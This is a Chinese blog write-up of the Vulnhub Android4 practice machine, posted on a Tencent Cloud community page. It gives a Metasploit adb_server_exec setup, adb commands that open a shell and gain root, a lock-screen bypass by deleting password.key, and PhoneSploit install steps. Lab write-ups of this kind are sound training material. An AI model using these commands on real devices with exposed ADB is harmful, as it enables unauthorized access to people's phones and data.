前往小程序,Get更优阅读体验!
立即前往
首页
学习
活动
专区
工具
TVP
发布
社区首页 >专栏 >Vulnhub - Android4

Vulnhub - Android4

作者头像
MssnHarvey
发布2023-02-27 17:21:00
3170
发布2023-02-27 17:21:00
举报
文章被收录于专栏:HarveyHarvey

nmap扫描存活主机和端口,发现开放了5555、8080、22000端口

访问8080端口如下:

代码语言:javascript
复制
Good Hackers ? means
we drop here our backdoor for access

If you r Smart Dan find Backdoor access...and safe your machine

we like POST things only.

扫目录发现.htaccessbackdoor.php,但是并没有啥用🥱

接着尝试一下其他办法(PHP CLIDropbear),搜索对应漏洞没有发现可利用的

然后来看5555端口即adb,可直接利用msf模块来打远程命令执行漏洞,但是它没有返回session也就没啥用了

代码语言:javascript
复制
use exploit/android/adb/adb_server_exec
set RHOSTS 192.168.150.157
set LHOST 192.168.150.128
set LPORT 3333

于是尝试直接adb成功连接拿到shell,su提权得到flag:ANDROID{u_GOT_root_buddy}

代码语言:javascript
复制
adb connect 192.168.150.157
adb devices
adb shell
adb shell screencap -p /sdcard/screen.png
adb pull /sdcard/screen.png

有了root权限后我们就可以直接绕过锁屏密码,在/data/system目录下有个password.key,直接将其删除即可无密码登录

再来试试Phonesploit,安装和使用命令如下:

代码语言:javascript
复制
apt install adb
git clone https://github.com/aerosol-can/PhoneSploit
cd PhoneSploit
pip3 install colorama
python3 phonesploit.py

它也和adb一样能进行截图等操作

小记写在最后面:就是这么一个简单的靶机其实花了我很长时间,一开始如下图所示处于offline的状态😒设置了禁止远程adb?

然后nc上去随便发个包看看,啥也不是🥲G

后面重启了下adb然后重启kali,再重启靶机,不知道试了多少次才成功了~

本文参与 腾讯云自媒体同步曝光计划,分享自作者个人站点/博客。
原始发表:2023-01-26,如有侵权请联系 cloudcommunity@tencent.com 删除

本文分享自 作者个人站点/博客 前往查看

如有侵权,请联系 cloudcommunity@tencent.com 删除。

本文参与 腾讯云自媒体同步曝光计划  ,欢迎热爱写作的你一起参与!

评论
登录后参与评论
0 条评论
热度
最新
推荐阅读
领券
问题归档专栏文章快讯文章归档关键词归档开发者手册归档开发者手册 Section 归档